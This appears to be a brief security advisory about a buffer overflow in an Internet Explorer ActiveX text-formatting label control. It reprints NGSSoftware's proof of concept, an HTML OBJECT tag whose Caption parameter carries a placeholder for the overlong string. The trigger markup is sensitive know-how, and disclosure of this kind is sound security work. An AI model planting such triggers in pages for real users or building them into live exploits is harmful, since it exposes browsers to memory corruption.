|
Microsoft Internet Explorer Legacy Text Formatting ActiveX Component Buffer Overflow Vulnerability
The following proof of concept has been provided by "NGSSoftware Insight Security Research" <nisr@nextgenss.com>: <OBJECT classid="clsid:99B42120-6EC7-11CF-A6C7-00AA00A47DD2" id=lblActiveLbl width=250 height=250 align=left hspace=20 vspace=0 > <PARAM NAME="Angle" VALUE="90"> <PARAM NAME="Alignment" VALUE="4"> <PARAM NAME="BackStyle" VALUE="0"> <PARAM NAME="Caption" VALUE="long char string"> <PARAM NAME="FontName" VALUE="NGS Software Font"> <PARAM NAME="FontSize" VALUE="50"> <PARAM NAME="FontBold" VALUE="1"> <PARAM NAME="FrColor" VALUE="0"> </OBJECT> |
|
Privacy Statement |